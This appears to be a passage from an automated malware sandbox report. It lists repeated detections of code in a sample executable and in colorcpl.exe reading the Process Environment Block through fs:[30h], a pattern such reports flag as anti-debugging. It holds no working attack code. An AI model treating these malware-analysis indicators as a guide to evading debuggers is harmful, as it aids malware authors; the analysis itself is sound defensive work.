          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B5AE73 mov eax, dword ptr fs:[00000030h]1_2_00B5AE73
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B5AE73 mov eax, dword ptr fs:[00000030h]1_2_00B5AE73
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B5AE73 mov eax, dword ptr fs:[00000030h]1_2_00B5AE73
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B5AE73 mov eax, dword ptr fs:[00000030h]1_2_00B5AE73
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B4766D mov eax, dword ptr fs:[00000030h]1_2_00B4766D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B47E41 mov eax, dword ptr fs:[00000030h]1_2_00B47E41
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B47E41 mov eax, dword ptr fs:[00000030h]1_2_00B47E41
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B47E41 mov eax, dword ptr fs:[00000030h]1_2_00B47E41
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B47E41 mov eax, dword ptr fs:[00000030h]1_2_00B47E41
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B47E41 mov eax, dword ptr fs:[00000030h]1_2_00B47E41
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B47E41 mov eax, dword ptr fs:[00000030h]1_2_00B47E41
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BFAE44 mov eax, dword ptr fs:[00000030h]1_2_00BFAE44
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BFAE44 mov eax, dword ptr fs:[00000030h]1_2_00BFAE44
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B48794 mov eax, dword ptr fs:[00000030h]1_2_00B48794
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB7794 mov eax, dword ptr fs:[00000030h]1_2_00BB7794
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB7794 mov eax, dword ptr fs:[00000030h]1_2_00BB7794
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB7794 mov eax, dword ptr fs:[00000030h]1_2_00BB7794
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B737F5 mov eax, dword ptr fs:[00000030h]1_2_00B737F5
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6E730 mov eax, dword ptr fs:[00000030h]1_2_00B6E730
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B34F2E mov eax, dword ptr fs:[00000030h]1_2_00B34F2E
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B34F2E mov eax, dword ptr fs:[00000030h]1_2_00B34F2E
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B5F716 mov eax, dword ptr fs:[00000030h]1_2_00B5F716
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C08F6A mov eax, dword ptr fs:[00000030h]1_2_00C08F6A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BCFF10 mov eax, dword ptr fs:[00000030h]1_2_00BCFF10
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BCFF10 mov eax, dword ptr fs:[00000030h]1_2_00BCFF10
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6A70E mov eax, dword ptr fs:[00000030h]1_2_00B6A70E
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6A70E mov eax, dword ptr fs:[00000030h]1_2_00B6A70E
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C0070D mov eax, dword ptr fs:[00000030h]1_2_00C0070D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C0070D mov eax, dword ptr fs:[00000030h]1_2_00C0070D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B4FF60 mov eax, dword ptr fs:[00000030h]1_2_00B4FF60
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B4EF40 mov eax, dword ptr fs:[00000030h]1_2_00B4EF40
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FD14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FE8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F2849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F3746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F4A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F4BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FC8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F96DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F37D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F53D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F93540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FC3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F1AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FDE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FE8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F9A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FE8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F58EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FCFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FAFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F2766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FDAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FDAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FCFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F1E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F48E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FD1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F28794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F2FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FE8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F2EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F4E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F3F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04F158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FAB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe  Code function: 7_2_04FAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4F0BF mov ecx, dword ptr fs:[00000030h]7_2_04F4F0BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4F0BF mov eax, dword ptr fs:[00000030h]7_2_04F4F0BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4F0BF mov eax, dword ptr fs:[00000030h]7_2_04F4F0BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F420A0 mov eax, dword ptr fs:[00000030h]7_2_04F420A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F420A0 mov eax, dword ptr fs:[00000030h]7_2_04F420A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F420A0 mov eax, dword ptr fs:[00000030h]7_2_04F420A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F420A0 mov eax, dword ptr fs:[00000030h]7_2_04F420A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F420A0 mov eax, dword ptr fs:[00000030h]7_2_04F420A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F420A0 mov eax, dword ptr fs:[00000030h]7_2_04F420A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F590AF mov eax, dword ptr fs:[00000030h]7_2_04F590AF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F19080 mov eax, dword ptr fs:[00000030h]7_2_04F19080
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F93884 mov eax, dword ptr fs:[00000030h]7_2_04F93884
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F93884 mov eax, dword ptr fs:[00000030h]7_2_04F93884
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE1074 mov eax, dword ptr fs:[00000030h]7_2_04FE1074
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD2073 mov eax, dword ptr fs:[00000030h]7_2_04FD2073
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F30050 mov eax, dword ptr fs:[00000030h]7_2_04F30050
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F30050 mov eax, dword ptr fs:[00000030h]7_2_04F30050
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F2B02A mov eax, dword ptr fs:[00000030h]7_2_04F2B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F2B02A mov eax, dword ptr fs:[00000030h]7_2_04F2B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F2B02A mov eax, dword ptr fs:[00000030h]7_2_04F2B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F2B02A mov eax, dword ptr fs:[00000030h]7_2_04F2B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4002D mov eax, dword ptr fs:[00000030h]7_2_04F4002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4002D mov eax, dword ptr fs:[00000030h]7_2_04F4002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4002D mov eax, dword ptr fs:[00000030h]7_2_04F4002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4002D mov eax, dword ptr fs:[00000030h]7_2_04F4002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4002D mov eax, dword ptr fs:[00000030h]7_2_04F4002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE4015 mov eax, dword ptr fs:[00000030h]7_2_04FE4015
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE4015 mov eax, dword ptr fs:[00000030h]7_2_04FE4015
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F97016 mov eax, dword ptr fs:[00000030h]7_2_04F97016
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F97016 mov eax, dword ptr fs:[00000030h]7_2_04F97016
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F97016 mov eax, dword ptr fs:[00000030h]7_2_04F97016
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F1B1E1 mov eax, dword ptr fs:[00000030h]7_2_04F1B1E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F1B1E1 mov eax, dword ptr fs:[00000030h]7_2_04F1B1E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F1B1E1 mov eax, dword ptr fs:[00000030h]7_2_04F1B1E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FA41E8 mov eax, dword ptr fs:[00000030h]7_2_04FA41E8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F951BE mov eax, dword ptr fs:[00000030h]7_2_04F951BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F951BE mov eax, dword ptr fs:[00000030h]7_2_04F951BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F951BE mov eax, dword ptr fs:[00000030h]7_2_04F951BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F951BE mov eax, dword ptr fs:[00000030h]7_2_04F951BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F461A0 mov eax, dword ptr fs:[00000030h]7_2_04F461A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F461A0 mov eax, dword ptr fs:[00000030h]7_2_04F461A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD49A4 mov eax, dword ptr fs:[00000030h]7_2_04FD49A4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD49A4 mov eax, dword ptr fs:[00000030h]7_2_04FD49A4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD49A4 mov eax, dword ptr fs:[00000030h]7_2_04FD49A4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD49A4 mov eax, dword ptr fs:[00000030h]7_2_04FD49A4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F969A6 mov eax, dword ptr fs:[00000030h]7_2_04F969A6
